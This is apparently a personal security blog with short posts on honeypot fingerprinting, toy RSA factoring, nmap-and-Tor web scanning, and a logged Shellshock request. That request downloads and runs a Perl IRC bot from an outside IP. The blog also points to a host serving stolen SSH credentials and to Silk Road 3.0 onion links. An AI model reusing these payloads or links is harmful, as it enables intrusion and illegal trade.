Chinese hackers

May 4th, 2017

Recently in a firewall log: 1 million deny entries PER DAY from China ..

Every day .. ~1 million deny entries with a source address in China.

Can’t we just ban them from the internet?


Honeypot detection

April 26th, 2017

My honeypots are sending out complaints on every single successful login.

Recently I saw the following commands logged in one of the complaints:

echo -en "\x31\x33\x33\x37"
cat /bin/ls

Now neither kippo nor cowrie (as sshd honeypots) has a file "/bin/ls" that could be read, so a 'cat /bin/ls' just results in:

‘cat: /bin/ls: No such file or directory’

So this seems to be an easy and reliable way to test for a standard sshd-honeypot..
No wonder: \x31\x33\x33\x37 just translates to "1337", which I interpret as a smiley left by the hacker ..
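Both halves of that snippet can be checked mechanically. Below is an added example in Python (mine, not code from the post or from kippo/cowrie): it expands the `\xNN` escapes the way `echo -e` does, flags any `cat` of a file under a binary directory as a fingerprint probe (the post shows `/bin/ls`; the check generalises to `/sbin`, `/usr/bin` and `/usr/sbin`, since reading an executable with `cat` is never a normal interactive action), and shows the attacker-side test: a real `cat /bin/ls` dumps an ELF image, anything else points at a honeypot. The session log is constructed in a cowrie-like `CMD:` style; only the two commands quoted above are taken from the post.

```python
import re

# Constructed cowrie-style session log. Only the two commands quoted in the
# post are real; the other lines are made up so the detector has something to skip.
SAMPLE_SESSION = [
    'CMD: echo -en "\\x31\\x33\\x33\\x37"',
    'CMD: cat /bin/ls',
    'CMD: uname -a',
    'CMD: cat /proc/cpuinfo',
    'CMD: cat /bin/busybox',
]

HEX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})')
ECHO_E = re.compile(r'^echo\s+-[a-zA-Z]*e[a-zA-Z]*\s+(.*)$')
# Directories that hold executables; cat-ing a file there only makes sense as
# a test whether the file really exists (i.e. whether this is a real box).
BINARY_DIRS = ('/bin/', '/sbin/', '/usr/bin/', '/usr/sbin/')


def decode_echo_escapes(text):
    """Expand \\xNN sequences the way `echo -e` does."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def echo_payload(cmd):
    """Return the decoded argument of an `echo -e` / `echo -en`, else None."""
    m = ECHO_E.match(cmd.strip())
    if not m:
        return None
    raw = m.group(1).strip()
    if len(raw) >= 2 and raw[0] == raw[-1] and raw[0] in '"\'':
        raw = raw[1:-1]
    return decode_echo_escapes(raw)


def is_binary_cat_probe(cmd):
    parts = cmd.split()
    return len(parts) >= 2 and parts[0] == 'cat' and parts[1].startswith(BINARY_DIRS)


def _commands(session_lines):
    return [line[len('CMD: '):] for line in session_lines if line.startswith('CMD: ')]


def fingerprint_probes(session_lines):
    """Commands in a session that try to read a system binary."""
    return [c for c in _commands(session_lines) if is_binary_cat_probe(c)]


def decoded_markers(session_lines):
    """What the attacker's echo -e lines spell out once the escapes are expanded."""
    return [p for p in map(echo_payload, _commands(session_lines)) if p is not None]


def looks_like_honeypot(cat_output):
    """Attacker-side view: on a real box `cat /bin/ls` starts with the ELF magic."""
    return not cat_output.startswith(b'\x7fELF')


if __name__ == '__main__':
    print('markers :', decoded_markers(SAMPLE_SESSION))
    print('probes  :', fingerprint_probes(SAMPLE_SESSION))
    print('honeypot:', looks_like_honeypot(b'cat: /bin/ls: No such file or directory\n'))
```

The defender-side consequence is the mirror image: the probe only works as long as the honeypot answers with an error or empty output. Cowrie can serve real contents for selected paths from its honeyfs directory, so handing out a genuine ELF file for `/bin/ls` takes this particular check away from the attacker.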

RSA broken?

February 25th, 2016

Via Twitter I was directed to

https://www.linkedin.com/pulse/rsa-beginning-end-william-buchanan

(Thanks @Andrea for retweeting)

and saw a really fascinating approach to breaking RSA via pre-calculated prime factors.

Here is an online RSA-cracker:

http://asecuritysite.com/encryption/crackrsa?n=89%2C070%2C570%2C720%2C149%2C060%2C561%2C995%2C361%2C437%2C269%2C869%2C694%2C609%2C685%2C454%2C824%2C674%2C559


(cracking N = 89070570720149060561995361437269869694609685454824674559, the 56-digit value in that URL)

Wondering what will come next..
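To show what "pre-calculated prime factors" amounts to, here is an added example in Python (mine, not the post's and not the code behind the linked cracker): a sieve builds the prime table, the modulus is trial-divided by that table, and once p and q are known the private exponent follows from phi(N). The toy key uses the two largest primes below 10^6 so the lookup succeeds; the last step of demo() feeds in a modulus whose factors both lie outside the table to show that the attack then finds nothing.

```python
import math


def primes_up_to(limit):
    """Sieve of Eratosthenes: this list is the 'pre-calculated prime table'."""
    sieve = bytearray([1]) * (limit + 1)
    sieve[0:2] = b"\x00\x00"
    for i in range(2, math.isqrt(limit) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytes(len(range(i * i, limit + 1, i)))
    return [i for i, is_prime in enumerate(sieve) if is_prime]


def factor_with_table(n, primes):
    """Trial-divide n by every table entry up to sqrt(n).

    Returns (smaller, larger) factor, or None when no entry divides n,
    i.e. when the smaller factor is not in the table."""
    for p in primes:
        if p * p > n:
            break
        if n % p == 0:
            return p, n // p
    return None


def recover_private_exponent(p, q, e):
    """With the factors known, d = e^-1 mod (p-1)(q-1) is immediate."""
    return pow(e, -1, (p - 1) * (q - 1))


def toy_keypair(primes, e=65537):
    """Toy key: p is the largest table prime, q the next one with gcd(e, phi) == 1."""
    p = primes[-1]
    for q in reversed(primes[:-1]):
        if math.gcd(e, (p - 1) * (q - 1)) == 1:
            return p, q, e
    raise ValueError("no usable q in table")


def demo():
    table = primes_up_to(10**6)          # the attacker's pre-computed table
    p, q, e = toy_keypair(table)
    n = p * q
    m = 1337
    c = pow(m, e, n)                     # what the attacker sees: n, e, c
    small, large = factor_with_table(n, table)
    d = recover_private_exponent(large, small, e)
    recovered = pow(c, d, n)
    # A modulus whose factors both lie outside the table defeats the lookup.
    bigger = primes_up_to(2 * 10**6)
    out_of_table = factor_with_table(bigger[-1] * bigger[-2], table)
    return n, recovered == m, out_of_table


if __name__ == "__main__":
    print(demo())   # (n, True, None)
```

That bound is the whole story: the cost grows with the size of the smaller factor, and no table anyone can store gets anywhere near the roughly 1024-bit factors of a 2048-bit RSA modulus. The 56-digit N above is about 186 bits, tiny by RSA standards; moduli of that size fall to ordinary factoring algorithms anyway, which is exactly why key sizes are what they are.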


remote website screenshots

January 12th, 2016

Recently I wanted to check if, and what kind of, web pages are available in a specific IP address range. So I decided to scan the IPs and take screenshots of the services found. Not as professional as archive.org or similar .. just a short look to get an idea. The problem was that there was no tool I could just fire up. So I started fiddling with some scripts ..

Step 1: scan the IP range. I used nmap (what else) and logged the results to a file.

 nmap --open -p80,443 --host-timeout 3 --max-retries 2 172.16.0.0/16 > ll

That went quite fast.. it took only a few minutes. After that I ran a small script to clean up the result:

#!/bin/bash
# hosts nmap gave up on ("Skipping host <name> (<ip>) due to host timeout") -> sl2
grep -i "skipping" *ll > sl
grep -oE '[0-9]+(\.[0-9]+){3}' sl > sl2
# hosts with a result ("Nmap scan report for <name> (<ip>)") -> l2
grep "report for" *ll > l
grep -oE '[0-9]+(\.[0-9]+){3}' l > l2
# drop the timed-out hosts from the result list; -x -F matches the whole
# line literally, so 172.16.1.2 does not also throw out 172.16.1.25
for i in $(cat sl2)
do
 grep -vxF "$i" l2 > xx
 mv xx l2
done

./l.sh
./i.sh

Okay .. here are l.sh and i.sh:
l.sh (start Tor first .. I don't want to annoy anyone..):

#!/bin/bash
# note: wkhtmltopdf fetches the images/css/js the saved page links to by itself,
# i.e. directly and not via Tor unless it is wrapped in torsocks as well
for i in $(cat l2)
do
 torsocks wget --convert-links -B "http://$i" --no-check-certificate -t 1 -T 2 -O "$i.html" "http://$i" ; xvfb-run -- wkhtmltopdf "$i.html" "$i.pdf"
 torsocks wget --convert-links -B "https://$i" --no-check-certificate -t 1 -T 2 -O "$i-443.html" "https://$i" ; xvfb-run -- wkhtmltopdf "$i-443.html" "$i-443.pdf"
done

It took some tries with wget until I had an acceptable result. I played around with "-p", "-r -l 1", "-E" and "-K" .. the one with just -B worked best for me. So I had the HTML files.. but I wanted to have a quick look at them and did not want to start browsing local files. Therefore I converted the HTML files to PDF, and then (in the next step) used convert to get PNG files. (I did not find any HTML-to-PNG tools.)

i.sh :

#!/bin/bash
# pdf -> png with ImageMagick (a multi-page pdf becomes name-0.png, name-1.png, ..)
for i in *.pdf
do
  convert "$i" "${i%.pdf}.png"
done

(After that: copy the PNG files to a place of your choice.., generate thumbnails.. scroll around…)

There are some commercial vendors for services like this with much better quality (including zoomable thumbnails, galleries.. you name it) but I wanted to have a quick'n'dirty solution for free..

Though I am pretty sure there are much better tools and a hundred better solutions, this worked for me.
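The cleaning step above parses nmap's human-readable output, which is where the host-timeout and hostname-in-parentheses special cases come from. As an added example (mine, not the post's scripts), here is the same "give me the list of web targets" step in Python reading nmap's XML output (`-oX`), which carries the open/closed state per port and marks timed-out hosts explicitly, so no text parsing is needed and each host is only fetched on the ports that are actually open. The XML below is constructed for the example, not a real scan.

```python
import xml.etree.ElementTree as ET

# Constructed `nmap -oX` output (no real scan): one host with both ports open,
# one with only 443 open, and one that ran into --host-timeout and has no port data.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap --open -p80,443 --host-timeout 3 -oX - 172.16.0.0/16">
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="172.16.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/></port>
      <port protocol="tcp" portid="443"><state state="open" reason="syn-ack"/></port>
    </ports>
  </host>
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="172.16.1.25" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="filtered" reason="no-response"/></port>
      <port protocol="tcp" portid="443"><state state="open" reason="syn-ack"/></port>
    </ports>
  </host>
  <host timedout="true">
    <status state="up" reason="syn-ack"/>
    <address addr="172.16.1.2" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

WEB_PORTS = {"80": "http", "443": "https"}


def web_targets(xml_text):
    """URLs to fetch: one per (host, open web port); timed-out hosts are skipped."""
    targets = []
    for host in ET.fromstring(xml_text).iter("host"):
        if host.get("timedout") == "true":
            continue  # nmap gave up on this host, nothing reliable to fetch
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            scheme = WEB_PORTS.get(port.get("portid"))
            if scheme and state is not None and state.get("state") == "open":
                targets.append(f"{scheme}://{addr.get('addr')}")
    return targets


if __name__ == "__main__":
    # one URL per line, i.e. a replacement for the l2 file the post's l.sh loops over
    print("\n".join(web_targets(SAMPLE_NMAP_XML)))
```

Note that 172.16.1.2 and 172.16.1.25 are handled correctly here without any care being taken: with structured output the prefix problem of a plain `grep -v` simply never arises.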

~7000 ssh logins

January 5th, 2016

Recently I looked at some honeypot results, which ended in finding the URL

http://185.62.190.222/r1

(Warning: without the /r1 you are forced into a fake Adobe update.)

Looking around further I found (besides some scanner tools, code..) two files, stage1 and stage2, under the subdir /r4, containing about 7000 username:password:ip-address combinations. And yes, I found some of my honeypot addresses in there 🙂 Though I am pretty sure that most of the addresses will be honeypots, I will try to send out mails to the appropriate abuse contacts; maybe some of them are for real.

recently in the webserver log ..

August 17th, 2015

While strolling through the webserver logs, I found this little asshole..:

78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi
HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch
http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl
fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""

fix.pl sets up an IRC connection and waits for commands like
portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to Shellshock ..
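The request above is easy to pick out of a log mechanically, because the trigger is always the same: a bash function definition, `() {`, placed at the start of a header value that a CGI would export into the environment. Here is an added example in Python (mine, not something from the post) that parses Apache combined-format lines, flags the pattern in the request line, Referer or User-Agent, and pulls out the download URLs as indicators. The sample log is constructed: the first line is the request quoted above joined onto one line, the other two are made up (one clean, one with the probe in the Referer).

```python
import re

# Constructed Apache combined-format lines. The first is the request quoted in the
# post (joined onto one line); the other two are made up for the example.
SAMPLE_ACCESS_LOG = r'''78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""
203.0.113.7 - - [16/Aug/2015:21:36:10 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/40.0"
198.51.100.9 - - [16/Aug/2015:21:37:44 +0200] "GET /cgi-bin/status.cgi HTTP/1.1" 200 12 "() { :; }; /usr/bin/id" "curl/7.35.0"
'''

# Quoted fields may contain \" (as the UA above does), hence the (?:[^"\\]|\\.)* groups.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
# The Shellshock trigger: a function definition "() {" at the start of an
# environment variable value. Exploit kits vary the whitespace, so allow \s*.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
URL_RE = re.compile(r'https?://[^\s;"\'\\|&<>]+')


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def shellshock_hits(log_text):
    """One record per line carrying the "() {" pattern in an attacker-controlled
    field, with the payload URLs extracted for blocking / IOC sharing."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("request", "referer", "ua"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({
                    "ip": rec["ip"],
                    "field": field,
                    "status": int(rec["status"]),
                    "urls": sorted(set(URL_RE.findall(rec[field]))),
                })
                break
    return hits


if __name__ == "__main__":
    for hit in shellshock_hits(SAMPLE_ACCESS_LOG):
        print(hit)
```

The status code is worth keeping in the record: the 404 on the logged request means the server never handed it to a CGI, so nothing was executed there, whereas a 200 on a /cgi-bin/ path with the same pattern should be treated as a possible compromise. To check a host's own bash, the well-known one-liner `env x='() { :;}; echo vulnerable' bash -c 'echo test'` prints "vulnerable" on an unpatched bash.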

So you want to be a darknet drug lord ..

April 16th, 2015

..is the title of an article a user named "th3j35t3r" published on Pastebin.

Here is the link to the interesting article

Starwars in the office

January 5th, 2015

Now here is a funny movie about what happens in an office when nerds get attacked..

https://t.co/JIBMlNs4ei

scanner at the airport

December 24th, 2014

A post in German about my experiences with body scanners at Cologne airport can be found at

http://verzaell.uss.koeln/?p=67


Merry Christmas everyone!

…and there it is again :-)

November 9th, 2014

It did not take too long this time.. Silk Road 3.0 is on its way..


— SilkRoad3.0 —
http://reloadedudjtjvxr.onion
— SilkRoad3.0 Forums —
http://b6bubdh43n6l6p72.onion

 http://pastebin.com/rJTmzwvM